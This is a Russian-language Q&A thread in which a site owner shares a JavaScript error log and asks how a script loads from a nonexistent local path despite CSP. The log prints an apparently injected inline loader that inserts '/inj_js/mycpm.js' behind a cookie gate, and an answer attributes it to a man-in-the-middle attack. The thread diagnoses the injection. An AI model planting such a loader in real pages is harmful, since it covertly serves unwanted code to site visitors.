# Исполнение внешнего скрипта с локальным SRC. Как такое возможно?

Tags: javascript, code-injection

Есть сервис, в котором ведётся локальное логирование JS ошибок, после возникновения которых часть лога отправляется на сервер для анализа. Вот пример:

```
30.07.2017, 10:49:51 =>> INFO: Bfn.MutationObserver: SCRIPT inserted => src: https://mc.yandex.ru/metrika/watch.js, innerHTML: EMPTY  =>> [ 1 ]
30.07.2017, 10:49:51 =>> INFO: Bfn.MutationObserver: SCRIPT inserted => innerHTML: if(!getCookie('MyCPMCU')){setTimeout(function gST(){var sBD=document.documentElement.firstChild;var sELM=document.createElement('script');sELM.setAttribute('src','/inj_js/mycpm.js'); sELM.setAttribute('type','text/javascript');sELM.setAttribute('async','true');sBD.insertBefore(sELM,sBD.firstChild);document.cookie='MyCPMCU=true; expires=' + (new Date(new Date().getTime() + 230 * 60 * 60 * 1000).toGMTString()) +'; path=/'}, 1000);}  =>> [ 1 ]
30.07.2017, 10:49:51 =>> INFO: Bfn.MutationObserver: SCRIPT inserted => innerHTML: (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter28123959 = new Ya.Metrika({id:28123959, ut:"noindex"}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks");  =>> [ 1 ]
30.07.2017, 10:49:52 =>> INFO: EXT BgSetLocalData: DATA saved!  =>> [ 1 ]
30.07.2017, 10:49:52 =>> INFO: EXT BgSetExtSetting: DATA saved!  =>> [ 1 ]
30.07.2017, 11:13:24 =>> ERROR: PAGE -> https://onlinezakladki.ru/, CODE -> Uncaught TypeError: Cannot set property 'innerHTML' of undefined (https://onlinezakladki.ru/inj_js/common.js:400) =>> [ 1 ]
```

Также, политикой CSP запрещена загрузка внешнего контента кроме как из разрешённых источников. Теперь, судя по логу, я вижу, что Во-первых, предпринимается попытка создания скрипта с указанием внутреннего несуществующего адреса ('/inj_js/mycpm.js'). Во-вторых, возникает ошибка в скрипте, который опять же судя по логу JS, расположен в несуществующей директории ().

Кто-то может объяснить суть подобного механизма? Я полагаю, что виновник скорее всего mycpm.ru (судя по имени файла mycpm.js), но как он действует?

Answer (score 0):

мое предположение - это MITM атака на сторона клиента.
На это указывает getCookie функция, ее нет по дефолту в JS и она определена до вставки скрипта. 
преимущество указания локального пути - это беспалевность раздающего рекламу хоста,  дабы блокировщики рекламы, антивирусы не заблочили его.
т.е раздает динамически скрипт mycpm.js, который на стороне in the middle получает с хоста рекламируемый урл.

Comment: Почитал про MITM. Функцию getCookie и в целом приведённый inline-script можно вставить с помощью браузерного дополнения, это мне понятно. А кто тогда перехватывает запрос и подменяет? Тоже ПО вирусное на ПК пользователя?

Comment: @Providec либо на ПК, либо на маршрутизаторе. примерчик mitmproxy.org - тулза, которая может слушать и вмешиваться в трафик. Но все таки это достаточно сложно для банального рекламного вирусняка. Но других объяснений я не вижу.

Comment: Благодарю tcpack4